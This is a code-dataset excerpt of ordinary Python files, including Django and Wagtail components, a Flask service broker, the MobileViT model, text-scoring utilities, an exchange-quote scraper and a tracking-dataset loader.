Dataset schema (⌀ = nullable):
hexsha: string (40) | size: int64 (4 - 1.02M) | ext: string (8 classes) | lang: string (1 value)
max_stars_repo_path: string (4 - 209) | max_stars_repo_name: string (5 - 121) | max_stars_repo_head_hexsha: string (40) | max_stars_repo_licenses: list (1 - 10) | max_stars_count: int64 (1 - 191k) ⌀ | max_stars_repo_stars_event_min_datetime: string (24) ⌀ | max_stars_repo_stars_event_max_datetime: string (24) ⌀
max_issues_repo_path: string (4 - 209) | max_issues_repo_name: string (5 - 121) | max_issues_repo_head_hexsha: string (40) | max_issues_repo_licenses: list (1 - 10) | max_issues_count: int64 (1 - 67k) ⌀ | max_issues_repo_issues_event_min_datetime: string (24) ⌀ | max_issues_repo_issues_event_max_datetime: string (24) ⌀
max_forks_repo_path: string (4 - 209) | max_forks_repo_name: string (5 - 121) | max_forks_repo_head_hexsha: string (40) | max_forks_repo_licenses: list (1 - 10) | max_forks_count: int64 (1 - 105k) ⌀ | max_forks_repo_forks_event_min_datetime: string (24) ⌀ | max_forks_repo_forks_event_max_datetime: string (24) ⌀
content: string (4 - 1.02M) | avg_line_length: float64 (1.07 - 66.1k) | max_line_length: int64 (4 - 266k) | alphanum_fraction: float64 (0.01 - 1)
hexsha: 1ec3d3afdc62f7fedb3c502ecf2fe5c80ab5e4b3 | size: 1,188 | ext: py | lang: Python
max_stars: django/core/mail/backends/console.py | dolfly/django | a971d19bab9bfc33d301669b319b4766bf6d94f6 | ["BSD-3-Clause"] | count: 1 | 2015-11-08T11:42:08.000Z - 2015-11-08T11:42:08.000Z
max_issues: django/core/mail/backends/console.py | dolfly/django | a971d19bab9bfc33d301669b319b4766bf6d94f6 | ["BSD-3-Clause"] | count: null | null - null
max_forks: django/core/mail/backends/console.py | dolfly/django | a971d19bab9bfc33d301669b319b4766bf6d94f6 | ["BSD-3-Clause"] | count: null | null - null
content:
"""
Email backend that writes messages to console instead of sending them.
"""
import sys
import threading
from django.core.mail.backends.base import BaseEmailBackend
class EmailBackend(BaseEmailBackend):
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stdout)
self._lock = threading.RLock()
super(EmailBackend, self).__init__(*args, **kwargs)
def send_messages(self, email_messages):
"""Write all messages to the stream in a thread-safe way."""
if not email_messages:
return
msg_count = 0
with self._lock:
try:
stream_created = self.open()
for message in email_messages:
self.stream.write('%s\n' % message.message().as_string())
self.stream.write('-' * 79)
self.stream.write('\n')
self.stream.flush() # flush after each message
msg_count += 1
if stream_created:
self.close()
except Exception:
if not self.fail_silently:
raise
return msg_count
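
A minimal usage sketch for the backend above, assuming a configured Django project; the addresses are placeholders and `send_mail` is Django's standard helper:

```python
# settings.py -- route all outgoing mail to stdout (useful in development)
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'

# anywhere in application code
from django.core.mail import send_mail

# The console backend prints the full message followed by a 79-character
# dashed separator instead of actually sending anything.
send_mail('Subject', 'Body text', 'from@example.com', ['to@example.com'])
```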
avg_line_length: 33.942857 | max_line_length: 77 | alphanum_fraction: 0.560606
hexsha: eb1a86266b924f8cd14adae3a02e5e1e0686e9f6 | size: 1,071 | ext: py | lang: Python
max_stars: questionnaires/migrations/0018_auto_20210929_1126.py | ChrisMarsh82/iogt | 8141421a79b73bd038880a3be92fa6809adced13 | ["BSD-2-Clause"] | count: 20 | 2021-04-29T12:36:25.000Z - 2022-03-27T12:17:41.000Z
max_issues: questionnaires/migrations/0018_auto_20210929_1126.py | ChrisMarsh82/iogt | 8141421a79b73bd038880a3be92fa6809adced13 | ["BSD-2-Clause"] | count: 892 | 2021-02-02T13:56:06.000Z - 2022-03-31T11:25:44.000Z
max_forks: questionnaires/migrations/0018_auto_20210929_1126.py | ChrisMarsh82/iogt | 8141421a79b73bd038880a3be92fa6809adced13 | ["BSD-2-Clause"] | count: 28 | 2021-02-19T19:28:37.000Z - 2022-03-11T11:46:00.000Z
content:
# Generated by Django 3.1.13 on 2021-09-29 11:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('questionnaires', '0017_auto_20210901_1844'),
]
operations = [
migrations.AlterField(
model_name='pollformfield',
name='clean_name',
field=models.TextField(blank=True, default='', help_text='Safe name of the form field, the label converted to ascii_snake_case', verbose_name='name'),
),
migrations.AlterField(
model_name='quizformfield',
name='clean_name',
field=models.TextField(blank=True, default='', help_text='Safe name of the form field, the label converted to ascii_snake_case', verbose_name='name'),
),
migrations.AlterField(
model_name='surveyformfield',
name='clean_name',
field=models.TextField(blank=True, default='', help_text='Safe name of the form field, the label converted to ascii_snake_case', verbose_name='name'),
),
]
avg_line_length: 36.931034 | max_line_length: 162 | alphanum_fraction: 0.64239
hexsha: a747a03155804de39e8e01967d7213cc35d8297e | size: 2,702 | ext: py | lang: Python
max_stars: wagtail/wagtailredirects/models.py | seddonym/wagtail-tableblock | aea3ce67a0800285b20b93018b7c0a8679e479b7 | ["BSD-3-Clause"] | count: null | null - null
max_issues: wagtail/wagtailredirects/models.py | seddonym/wagtail-tableblock | aea3ce67a0800285b20b93018b7c0a8679e479b7 | ["BSD-3-Clause"] | count: null | null - null
max_forks: wagtail/wagtailredirects/models.py | seddonym/wagtail-tableblock | aea3ce67a0800285b20b93018b7c0a8679e479b7 | ["BSD-3-Clause"] | count: null | null - null
content:
from __future__ import unicode_literals
from django.db import models
from django.utils.six.moves.urllib.parse import urlparse
from django.utils.translation import ugettext_lazy as _
class Redirect(models.Model):
old_path = models.CharField(verbose_name=_("redirect from"), max_length=255, db_index=True)
site = models.ForeignKey(
'wagtailcore.Site', verbose_name=_('site'), null=True, blank=True, related_name='redirects', db_index=True
)
is_permanent = models.BooleanField(verbose_name=_("permanent"), default=True, help_text=_(
"Recommended. Permanent redirects ensure search engines "
"forget the old page (the 'Redirect from') and index the new page instead."
))
redirect_page = models.ForeignKey('wagtailcore.Page', verbose_name=_("redirect to a page"), null=True, blank=True)
redirect_link = models.URLField(verbose_name=_("redirect to any URL"), blank=True)
@property
def title(self):
return self.old_path
@property
def link(self):
if self.redirect_page:
return self.redirect_page.url
else:
return self.redirect_link
def get_is_permanent_display(self):
if self.is_permanent:
return "permanent"
else:
return "temporary"
@classmethod
def get_for_site(cls, site=None):
if site:
return cls.objects.filter(models.Q(site=site) | models.Q(site=None))
else:
return cls.objects.all()
@staticmethod
def normalise_path(url):
# Strip whitespace
url = url.strip()
# Parse url
url_parsed = urlparse(url)
# Path must start with / but not end with /
path = url_parsed[2]
if not path.startswith('/'):
path = '/' + path
if path.endswith('/'):
path = path[:-1]
# Parameters must be sorted alphabetically
parameters = url_parsed[3]
parameters_components = parameters.split(';')
parameters = ';'.join(sorted(parameters_components))
# Query string components must be sorted alphabetically
query_string = url_parsed[4]
query_string_components = query_string.split('&')
query_string = '&'.join(sorted(query_string_components))
if parameters:
path = path + ';' + parameters
# Add query string to path
if query_string:
path = path + '?' + query_string
return path
def clean(self):
# Normalise old path
self.old_path = Redirect.normalise_path(self.old_path)
class Meta:
verbose_name = _('redirect')
unique_together = [('old_path', 'site')]
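
To show what `normalise_path` produces without a Django/Wagtail install, here is a standalone sketch that mirrors the same steps (strip whitespace, force a leading and drop a trailing slash, sort `;`-parameters and query components) using the stdlib parser; the free function and the sample URL are illustrative only:

```python
from urllib.parse import urlparse

def normalise_path(url):
    # Mirrors Redirect.normalise_path above, step for step.
    url = url.strip()
    parts = urlparse(url)
    path = parts[2]
    if not path.startswith('/'):
        path = '/' + path
    if path.endswith('/'):
        path = path[:-1]
    parameters = ';'.join(sorted(parts[3].split(';')))
    query_string = '&'.join(sorted(parts[4].split('&')))
    if parameters:
        path = path + ';' + parameters
    if query_string:
        path = path + '?' + query_string
    return path

print(normalise_path(' /news/?b=2&a=1 '))  # -> /news?a=1&b=2
```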
avg_line_length: 31.418605 | max_line_length: 118 | alphanum_fraction: 0.633605
hexsha: fab083cb35c21a17c51c7e72f52eb1d0f8db5ad2 | size: 3,397 | ext: py | lang: Python
max_stars: server.py | Dew-bench/service-broker | 5f4de5ae92a46ef285ef4e58e2fd9744aca72ff2 | ["Unlicense"] | count: null | null - null
max_issues: server.py | Dew-bench/service-broker | 5f4de5ae92a46ef285ef4e58e2fd9744aca72ff2 | ["Unlicense"] | count: null | null - null
max_forks: server.py | Dew-bench/service-broker | 5f4de5ae92a46ef285ef4e58e2fd9744aca72ff2 | ["Unlicense"] | count: null | null - null
content:
from flask import Flask, request
import socket
import json
import requests
app = Flask(__name__)
CONSUMERS = {}
PROVIDERS = {}
SERVICES = {}
PROVIDER_SETTINGS = {} # TODO
PROVIDER_URL = ""
######################################
@app.route('/')
def hello_world():
return 'Service broker'
@app.route('/api/ip')
def get_ip():
h_name = socket.gethostname()
    ip_address = socket.gethostbyname(h_name)
    return json.dumps({
        "host_name": h_name,
        "ip": ip_address
})
######################################
# @app.route('/api/consumer/register', methods=['POST', 'PUT'])
# def add_device():
# data = request.get_json()
# CONSUMERS[data['url']] = data
# return "ok"
# @app.route('/api/consumer/unregister', methods=['POST', 'PUT'])
# def remove_device():
# data = request.get_json()
# CONSUMERS.pop(data['url'])
# return "ok"
# @app.route('/api/consumer/list', methods=['GET'])
# def list_device():
# return json.dumps(CONSUMERS)
######################################
# @app.route('/api/provider/register', methods=['POST', 'PUT'])
# def add_device():
# data = request.get_json()
# PROVIDERS[data['url']] = data
# return "ok"
# @app.route('/api/provider/unregister', methods=['POST', 'PUT'])
# def remove_device():
# data = request.get_json()
# PROVIDERS.pop(data['url'])
# return "ok"
# @app.route('/api/provider/list', methods=['GET'])
# def list_device():
# return json.dumps(PROVIDERS)
######################################
@app.route('/api/provider/register', methods=['POST', 'PUT'])
def add_device():
data = request.get_json()
global PROVIDER_URL
PROVIDER_URL = data['url']
return "ok"
@app.route('/api/provider/list', methods=['GET'])
def list_device():
return json.dumps(PROVIDER_URL)
######################################
@app.route('/api/service/request', methods=['POST', 'PUT'])
def add_depl():
data = request.get_json()
print(data)
try:
r = requests.put("{}/api/service/add".format(PROVIDER_URL), json=data)
print(r.content)
    except Exception:
print("exception")
# SERVICES[data['id']] = data
return "ok"
@app.route('/api/service/remove', methods=['POST', 'PUT'])
def remove_depl():
data = request.get_json()
try:
print(data)
r = requests.put("{}/api/service/remove".format(PROVIDER_URL), json=data)
print(r.content)
    except Exception:
print("exception")
# SERVICES.pop(data['id'])
return "ok"
@app.route('/api/service/url', methods=['POST', 'PUT'])
def url_depl():
data = request.get_json()
try:
print(data)
r = requests.put("{}/api/service/url".format(PROVIDER_URL), json=data)
print(r.content)
    except Exception:
        # the forward request failed, so r was never bound
        print("exception")
        return "error"
    # SERVICES.pop(data['id'])
    return r.text  # return the provider's response body; Flask cannot serialise a requests.Response
@app.route('/api/service/list', methods=['GET'])
def list_depl():
return json.dumps(SERVICES)
# ######################################
# @app.route('/api/provider/settings', methods=['POST', 'PUT'])
# def add_broker():
# data = request.get_json()
# PROVIDER_SETTINGS[data['id']] = data
# return "ok"
# @app.route('/api/provider/list/settings', methods=['GET'])
# def list_brokers():
# return json.dumps(BROKERS)
# ######################################
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=5000)
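
A hedged client-side sketch of the endpoints above; the broker address matches the default `app.run` bind, while the provider URL and service payload keys are placeholders, since the broker simply forwards the JSON body:

```python
import requests

BROKER = "http://localhost:5000"

# Register a provider; the broker stores only data['url'] in PROVIDER_URL.
requests.put(f"{BROKER}/api/provider/register",
             json={"url": "http://provider.local:6000"})

# Ask the broker to relay a service request to the registered provider
# (it forwards the JSON body to <PROVIDER_URL>/api/service/add).
requests.put(f"{BROKER}/api/service/request",
             json={"id": "svc-1", "image": "nginx"})

# Inspect what the broker currently knows.
print(requests.get(f"{BROKER}/api/provider/list").text)
```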
avg_line_length: 24.264286 | max_line_length: 81 | alphanum_fraction: 0.564616
hexsha: afce703cfdcd5c911f2e36badc9f0a58dcb97c77 | size: 10,133 | ext: py | lang: Python
max_stars: cvnets/models/classification/mobilevit.py | apple/ml-cvnets | 84d992f413e52c0468f86d23196efd9dad885e6f | ["AML"] | count: 209 | 2021-10-30T08:32:10.000Z - 2022-03-31T16:18:03.000Z
max_issues: cvnets/models/classification/mobilevit.py | apple/ml-cvnets | 84d992f413e52c0468f86d23196efd9dad885e6f | ["AML"] | count: 12 | 2021-12-04T10:47:11.000Z - 2022-03-31T15:39:40.000Z
max_forks: cvnets/models/classification/mobilevit.py | apple/ml-cvnets | 84d992f413e52c0468f86d23196efd9dad885e6f | ["AML"] | count: 50 | 2021-11-01T08:15:02.000Z - 2022-03-29T08:17:34.000Z
content:
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from torch import nn
import argparse
from typing import Dict, Tuple, Optional
from utils import logger
from . import register_cls_models
from .base_cls import BaseEncoder
from .config.mobilevit import get_configuration
from ...layers import ConvLayer, LinearLayer, GlobalPool, Dropout, SeparableConv
from ...modules import InvertedResidual, MobileViTBlock
@register_cls_models("mobilevit")
class MobileViT(BaseEncoder):
"""
This class implements the `MobileViT architecture <https://arxiv.org/abs/2110.02178?context=cs.LG>`_
"""
def __init__(self, opts, *args, **kwargs) -> None:
num_classes = getattr(opts, "model.classification.n_classes", 1000)
classifier_dropout = getattr(
opts, "model.classification.classifier_dropout", 0.0
)
pool_type = getattr(opts, "model.layer.global_pool", "mean")
image_channels = 3
out_channels = 16
mobilevit_config = get_configuration(opts=opts)
super().__init__(*args, **kwargs)
# store model configuration in a dictionary
self.model_conf_dict = dict()
self.conv_1 = ConvLayer(
opts=opts,
in_channels=image_channels,
out_channels=out_channels,
kernel_size=3,
stride=2,
use_norm=True,
use_act=True,
)
self.model_conf_dict["conv1"] = {"in": image_channels, "out": out_channels}
in_channels = out_channels
self.layer_1, out_channels = self._make_layer(
opts=opts, input_channel=in_channels, cfg=mobilevit_config["layer1"]
)
self.model_conf_dict["layer1"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_2, out_channels = self._make_layer(
opts=opts, input_channel=in_channels, cfg=mobilevit_config["layer2"]
)
self.model_conf_dict["layer2"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_3, out_channels = self._make_layer(
opts=opts, input_channel=in_channels, cfg=mobilevit_config["layer3"]
)
self.model_conf_dict["layer3"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_4, out_channels = self._make_layer(
opts=opts,
input_channel=in_channels,
cfg=mobilevit_config["layer4"],
dilate=self.dilate_l4,
)
self.model_conf_dict["layer4"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_5, out_channels = self._make_layer(
opts=opts,
input_channel=in_channels,
cfg=mobilevit_config["layer5"],
dilate=self.dilate_l5,
)
self.model_conf_dict["layer5"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
exp_channels = min(mobilevit_config["last_layer_exp_factor"] * in_channels, 960)
self.conv_1x1_exp = ConvLayer(
opts=opts,
in_channels=in_channels,
out_channels=exp_channels,
kernel_size=1,
stride=1,
use_act=True,
use_norm=True,
)
self.model_conf_dict["exp_before_cls"] = {
"in": in_channels,
"out": exp_channels,
}
self.classifier = nn.Sequential()
self.classifier.add_module(
name="global_pool", module=GlobalPool(pool_type=pool_type, keep_dim=False)
)
if 0.0 < classifier_dropout < 1.0:
self.classifier.add_module(
name="dropout", module=Dropout(p=classifier_dropout, inplace=True)
)
self.classifier.add_module(
name="fc",
module=LinearLayer(
in_features=exp_channels, out_features=num_classes, bias=True
),
)
# check model
self.check_model()
# weight initialization
self.reset_parameters(opts=opts)
@classmethod
def add_arguments(cls, parser: argparse.ArgumentParser) -> argparse.ArgumentParser:
group = parser.add_argument_group(
title="".format(cls.__name__), description="".format(cls.__name__)
)
group.add_argument(
"--model.classification.mit.mode",
type=str,
default="small",
choices=["xx_small", "x_small", "small"],
help="MobileViT mode. Defaults to small",
)
group.add_argument(
"--model.classification.mit.attn-dropout",
type=float,
default=0.0,
help="Dropout in attention layer. Defaults to 0.0",
)
group.add_argument(
"--model.classification.mit.ffn-dropout",
type=float,
default=0.0,
help="Dropout between FFN layers. Defaults to 0.0",
)
group.add_argument(
"--model.classification.mit.dropout",
type=float,
default=0.0,
help="Dropout in Transformer layer. Defaults to 0.0",
)
group.add_argument(
"--model.classification.mit.transformer-norm-layer",
type=str,
default="layer_norm",
help="Normalization layer in transformer. Defaults to LayerNorm",
)
group.add_argument(
"--model.classification.mit.no-fuse-local-global-features",
action="store_true",
help="Do not combine local and global features in MobileViT block",
)
group.add_argument(
"--model.classification.mit.conv-kernel-size",
type=int,
default=3,
help="Kernel size of Conv layers in MobileViT block",
)
group.add_argument(
"--model.classification.mit.head-dim",
type=int,
default=None,
help="Head dimension in transformer",
)
group.add_argument(
"--model.classification.mit.number-heads",
type=int,
default=None,
help="Number of heads in transformer",
)
return parser
def _make_layer(
self,
opts,
input_channel,
cfg: Dict,
dilate: Optional[bool] = False,
*args,
**kwargs
) -> Tuple[nn.Sequential, int]:
block_type = cfg.get("block_type", "mobilevit")
if block_type.lower() == "mobilevit":
return self._make_mit_layer(
opts=opts, input_channel=input_channel, cfg=cfg, dilate=dilate
)
else:
return self._make_mobilenet_layer(
opts=opts, input_channel=input_channel, cfg=cfg
)
@staticmethod
def _make_mobilenet_layer(
opts, input_channel: int, cfg: Dict, *args, **kwargs
) -> Tuple[nn.Sequential, int]:
output_channels = cfg.get("out_channels")
num_blocks = cfg.get("num_blocks", 2)
expand_ratio = cfg.get("expand_ratio", 4)
block = []
for i in range(num_blocks):
stride = cfg.get("stride", 1) if i == 0 else 1
layer = InvertedResidual(
opts=opts,
in_channels=input_channel,
out_channels=output_channels,
stride=stride,
expand_ratio=expand_ratio,
)
block.append(layer)
input_channel = output_channels
return nn.Sequential(*block), input_channel
def _make_mit_layer(
self,
opts,
input_channel,
cfg: Dict,
dilate: Optional[bool] = False,
*args,
**kwargs
) -> Tuple[nn.Sequential, int]:
prev_dilation = self.dilation
block = []
stride = cfg.get("stride", 1)
if stride == 2:
if dilate:
self.dilation *= 2
stride = 1
layer = InvertedResidual(
opts=opts,
in_channels=input_channel,
out_channels=cfg.get("out_channels"),
stride=stride,
expand_ratio=cfg.get("mv_expand_ratio", 4),
dilation=prev_dilation,
)
block.append(layer)
input_channel = cfg.get("out_channels")
head_dim = cfg.get("head_dim", 32)
transformer_dim = cfg["transformer_channels"]
ffn_dim = cfg.get("ffn_dim")
if head_dim is None:
num_heads = cfg.get("num_heads", 4)
if num_heads is None:
num_heads = 4
head_dim = transformer_dim // num_heads
if transformer_dim % head_dim != 0:
logger.error(
"Transformer input dimension should be divisible by head dimension. "
"Got {} and {}.".format(transformer_dim, head_dim)
)
block.append(
MobileViTBlock(
opts=opts,
in_channels=input_channel,
transformer_dim=transformer_dim,
ffn_dim=ffn_dim,
n_transformer_blocks=cfg.get("transformer_blocks", 1),
patch_h=cfg.get("patch_h", 2),
patch_w=cfg.get("patch_w", 2),
dropout=getattr(opts, "model.classification.mit.dropout", 0.1),
ffn_dropout=getattr(opts, "model.classification.mit.ffn_dropout", 0.0),
attn_dropout=getattr(
opts, "model.classification.mit.attn_dropout", 0.1
),
head_dim=head_dim,
no_fusion=getattr(
opts,
"model.classification.mit.no_fuse_local_global_features",
False,
),
conv_ksize=getattr(
opts, "model.classification.mit.conv_kernel_size", 3
),
)
)
return nn.Sequential(*block), input_channel
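
The `add_arguments` method above registers dotted, dash-separated flags (for example `--model.classification.mit.attn-dropout`) that are later read back with `getattr(opts, "model.classification.mit.attn_dropout", ...)`. A small self-contained sketch of why this round-trip works with plain `argparse` (dashes become underscores in the attribute name while the dots are preserved):

```python
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--model.classification.mit.attn-dropout",
                    type=float, default=0.0)
parser.add_argument("--model.classification.mit.mode",
                    type=str, default="small",
                    choices=["xx_small", "x_small", "small"])

opts = parser.parse_args(["--model.classification.mit.mode", "x_small"])

# argparse stores the value under the dotted name with '-' replaced by '_',
# so the model code can fetch it exactly as MobileViT does above.
print(getattr(opts, "model.classification.mit.attn_dropout", 0.0))  # 0.0
print(getattr(opts, "model.classification.mit.mode", "small"))      # x_small
```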
avg_line_length: 33.442244 | max_line_length: 104 | alphanum_fraction: 0.566861
hexsha: 44f2ce8a09c1728070aee4416554f8de70a92af9 | size: 2,161 | ext: py | lang: Python
max_stars: src/models/CCIG/data/sentence_score.py | stillyuyi/ArticlePairMatching | f9cf63ad4c398d377f3d0291f552fb99f81020ef | ["BSD-3-Clause"] | count: 227 | 2019-05-22T14:10:55.000Z - 2022-03-31T07:39:31.000Z
max_issues: src/models/CCIG/data/sentence_score.py | stillyuyi/ArticlePairMatching | f9cf63ad4c398d377f3d0291f552fb99f81020ef | ["BSD-3-Clause"] | count: 35 | 2019-06-18T07:39:28.000Z - 2021-11-19T03:51:07.000Z
max_forks: src/models/CCIG/data/sentence_score.py | stillyuyi/ArticlePairMatching | f9cf63ad4c398d377f3d0291f552fb99f81020ef | ["BSD-3-Clause"] | count: 62 | 2019-06-14T07:10:30.000Z - 2022-02-04T19:59:32.000Z
content:
# coding=utf-8
"""
This file contains functions that assign a sentence
in a document a weight score.
"""
import math
from sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer
import networkx as nx
from config import *
from util.tfidf_utils import *
def tfidf(sentence, idf_dict):
tfidf_dict = gen_tf(sentence, idf_dict)
weight = sum(tfidf_dict.values())
return weight
def num_ner(sentence, ners):
return len(set(str(sentence).split()).intersection(set(ners)))
def contain_number(sentence):
if any(char.isdigit() for char in sentence):
return 1.0
else:
return 0.0
def score_sentence_length(sentence):
return len(str(sentence).split())
def score_sentence_position(paragraph_idx, sentence_idx, alpha, beta):
return math.exp(-alpha * paragraph_idx) * math.exp(-beta * sentence_idx)
def resemblance_to_title(sentence, title):
str1 = set(str(sentence).split())
str2 = set(str(title).split())
if len(str1) == 0 or len(str2) == 0:
return 0.0
return float(len(str1 & str2)) / len(str2)
def textrank(sentences):
"""
    Given a list of sentences, calculate a TextRank score for each one.
:param sentences: input sentence list
:return: a dictionary of (sentence index, sentence score)
"""
bow_matrix = CountVectorizer().fit_transform(sentences)
normalized = TfidfTransformer().fit_transform(bow_matrix)
similarity_graph = normalized * normalized.T
nx_graph = nx.from_scipy_sparse_matrix(similarity_graph)
scores = nx.pagerank(nx_graph)
return dict(((i, scores[i]) for i, s in enumerate(sentences)))
if __name__ == "__main__":
sentence = "中国 人民 1"
title = "中国 和 人民"
ner = ["中国"]
# print num_ner(sentence, ner)
# print contain_number(sentence)
# print score_sentence_length(sentence)
# print score_sentence_position(1, 1, 1, 1)
# print resemblance_to_title(sentence, title)
# ALPHA = 0.1
# BETA = 0.3
# idxs1 = [0, 1, 2]
# print [score_sentence_position(0, s_idx1, ALPHA, BETA) for s_idx1 in idxs1]
# print sum([score_sentence_position(0, s_idx1, ALPHA, BETA) for s_idx1 in idxs1])
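
A small standalone check of two of the pure scoring functions above; they are copied here only so the snippet runs without the repo's `config` and `util` imports, and the printed values are what the original code yields for its own example sentences:

```python
import math

def score_sentence_position(paragraph_idx, sentence_idx, alpha, beta):
    return math.exp(-alpha * paragraph_idx) * math.exp(-beta * sentence_idx)

def resemblance_to_title(sentence, title):
    str1 = set(str(sentence).split())
    str2 = set(str(title).split())
    if len(str1) == 0 or len(str2) == 0:
        return 0.0
    return float(len(str1 & str2)) / len(str2)

# e^-1 * e^-1 ~= 0.1353: later paragraphs and sentences are weighted down.
print(score_sentence_position(1, 1, 1, 1))

# "中国 人民 1" shares 2 of the 3 title tokens in "中国 和 人民" -> 2/3.
print(resemblance_to_title("中国 人民 1", "中国 和 人民"))
```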
avg_line_length: 29.202703 | max_line_length: 86 | alphanum_fraction: 0.694586
hexsha: ac982cf60c36562419f704f3048b6ed47dc24e14 | size: 3,655 | ext: py | lang: Python
max_stars: Market/market_DL.py | Alan-Du/Commodity_Tracker | fc7d4c92535424be7dc82f47dd513332b4b772c9 | ["Unlicense"] | count: 1 | 2020-04-12T22:32:01.000Z - 2020-04-12T22:32:01.000Z
max_issues: Market/market_DL.py | Alan-Du/Commodity_Tracker | fc7d4c92535424be7dc82f47dd513332b4b772c9 | ["Unlicense"] | count: null | null - null
max_forks: Market/market_DL.py | Alan-Du/Commodity_Tracker | fc7d4c92535424be7dc82f47dd513332b4b772c9 | ["Unlicense"] | count: 1 | 2021-06-11T09:19:12.000Z - 2021-06-11T09:19:12.000Z
content:
"""
Created on Sun Sep 22 08:24:36 2019
@author: shaolun du
@contact: Shaolun.du@gmail.com
Structure outline:
    Fetch the exchange's daily-quotes HTML page and parse it with pandas.read_html.
"""
import requests
import pandas as pd
from Market.exc_parser import exc_parser
from Market.gen_process_params import gen_proc_params
class DL_parser(exc_parser):
""" Shanghai exchange parser
"""
def __init__( self ):
self.__col_names = ["Dates","Code","Open","High","Low","Close","OPI","Vol"]
self.__exc_name = "DL"
self.__URL_TEMPL = "http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html"
self.__headers = { 'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'JSESSIONID=34581314E8E6F047ABE7D22180DCE3A2; WMONID=-b8uBX4vHDi; Hm_lvt_a50228174de2a93aee654389576b60fb=1567732473,1568333912,1568936184,1569113640; Hm_lpvt_a50228174de2a93aee654389576b60fb=1569113660',
'Referer': 'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
self.__payload = { 'dayQuotes.variety': 'all',
'dayQuotes.trade_type': '0',
'year': 0,
'month':0,
'day': 0,
}
self.__name_map = {"豆一":"a","豆二":"b","乙二醇":"eg","焦煤":"jm","焦炭":"j",
"铁矿石":"i","聚氯乙烯":"pvc","聚丙烯":"pp","聚乙烯":"pe","豆粕":"m",
"豆油":"y","棕榈油":"p","鸡蛋":"jd","玉米淀粉":"cs","玉米":"c"}
self.__datas = []
def _get_URL_TEMP(self):
# update exchange url
return self.__URL_TEMPL
def _read_html_format(self,page,dates):
df = pd.read_html(page,skiprows=0)[0]
df.iloc[:,0] = df.iloc[:,0].map(self.__name_map)
df = df.dropna()
df["Dates"] = str(dates[0])+"{:02d}".format(dates[1]+1)+"{:02d}".format(dates[2])
df["Code"] = df.iloc[:,0]+df.iloc[:,1].astype(int).astype(str)
df["Open"] = df.iloc[:,2]
df["High"] = df.iloc[:,3]
df["Low"] = df.iloc[:,4]
df["Close"] = df.iloc[:,5]
df["OPI"] = df.iloc[:,11]
df["Vol"] = df.iloc[:,10]
df = df[["Dates","Code","Open","High","Low","Close","OPI","Vol"]]
return df
def _download(self,sdate,edate):
print("Exchange DL--->")
# Start downloading given period
dates_li = gen_proc_params(self.__exc_name,sdate,edate)
ans = pd.DataFrame()
with requests.Session() as s:
# Open request session
for dates in dates_li:
print(dates)
self.__payload['year'] = dates[0]
self.__payload['month'] = dates[1]
self.__payload['day'] = dates[2]
page = s.post( self.__URL_TEMPL, data=self.__payload, headers=self.__headers).text
try:
df = self._read_html_format(page,dates)
except:
continue
ans = ans.append(df)
self.__datas = ans
def _get_data_df(self):
# Convert output format
self.__datas = self.__datas.dropna()
self.__datas["Dates"] = pd.to_datetime(self.__datas["Dates"]).dt.date
self.__datas = self.__datas.set_index("Dates")
self.__datas["Code"] = self.__datas["Code"].astype(str)
return self.__datas
avg_line_length: 46.265823 | max_line_length: 244 | alphanum_fraction: 0.533242
hexsha: d789521bd0d81779168834374e73aaa5d9121452 | size: 1,991 | ext: py | lang: Python
max_stars: videoanalyst/data/dataset/dataset_impl/trackingnet.py | yutliu/betterSAT | fb983f43b12352f9ee6ae40b4e0954f6ba502fb8 | ["MIT"] | count: 2 | 2020-07-30T08:26:08.000Z - 2020-11-24T07:40:46.000Z
max_issues: videoanalyst/data/dataset/dataset_impl/trackingnet.py | shartoo/video_analyst | db7c1b323f26ec19533a4b19804cf2c8a52643e5 | ["MIT"] | count: null | null - null
max_forks: videoanalyst/data/dataset/dataset_impl/trackingnet.py | shartoo/video_analyst | db7c1b323f26ec19533a4b19804cf2c8a52643e5 | ["MIT"] | count: null | null - null
content:
# -*- coding: utf-8 -*-
import os.path as osp
from typing import Dict
import cv2
import numpy as np
from loguru import logger
from yacs.config import CfgNode
from videoanalyst.data.dataset.dataset_base import TRACK_DATASETS, DatasetBase
from videoanalyst.evaluation.got_benchmark.datasets import TrackingNet
from videoanalyst.pipeline.utils.bbox import xywh2xyxy
_current_dir = osp.dirname(osp.realpath(__file__))
@TRACK_DATASETS.register
class TrackingNetDataset(DatasetBase):
r"""
    TrackingNet dataset helper
Hyper-parameters
----------------
dataset_root: str
path to root of the dataset
subset: str
dataset split name (train|val|train_val)
ratio: float
dataset ratio. used by sampler (data.sampler).
max_diff: int
maximum difference in index of a pair of sampled frames
check_integrity: bool
if check integrity of dataset or not
"""
default_hyper_params = dict(
dataset_root="datasets/TrackingNet",
subset="train",
ratio=1.0,
max_diff=100,
check_integrity=True,
)
def __init__(self) -> None:
super(TrackingNetDataset, self).__init__()
self._state["dataset"] = None
def update_params(self):
r"""
an interface for update params
"""
dataset_root = osp.realpath(self._hyper_params["dataset_root"])
subset = self._hyper_params["subset"]
check_integrity = self._hyper_params["check_integrity"]
cache_dir = osp.join(dataset_root, "cache/vid")
self._state["dataset"] = TrackingNet(
dataset_root,
subset=subset,
# cache_dir=cache_dir,
)
def __getitem__(self, item: int) -> Dict:
img_files, anno = self._state["dataset"][item]
anno = xywh2xyxy(anno)
sequence_data = dict(image=img_files, anno=anno)
return sequence_data
def __len__(self):
return len(self._state["dataset"])
avg_line_length: 28.442857 | max_line_length: 78 | alphanum_fraction: 0.657459
